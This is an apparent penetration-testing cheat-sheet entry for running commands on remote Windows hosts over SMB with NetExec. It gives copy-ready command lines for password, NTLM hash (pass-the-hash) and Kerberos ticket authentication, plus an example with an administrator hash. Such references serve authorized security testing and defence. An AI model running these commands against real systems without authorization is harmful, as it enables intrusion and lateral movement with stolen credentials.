NetExec SMB Command Exec

Execute commands on a remote Windows host via SMB using NetExec

Tool
nxc
Category
Lateral Movement / Remote Shells
Platform
linux
Requires
password
Protocols
SMB

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc smb '<ip>' -u '<user>' -p '<password>' -d '<domain>' -X 'whoami'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

nxc smb '<ip>' -u '<user>' -H '<hash>' -d '<domain>' -X 'whoami'

Kerberos Ticket requires Kerberos ticket

nxc smb '<ip>' --use-kcache -d '<domain>' -X 'whoami'

Examples

nxc smb '192.168.1.100' -u 'administrator' -H 'f29207796c9e6829aa1882b7cccfa36d' -d 'bastion.local' -X 'whoami'

Tags

nxc smb execution shell rce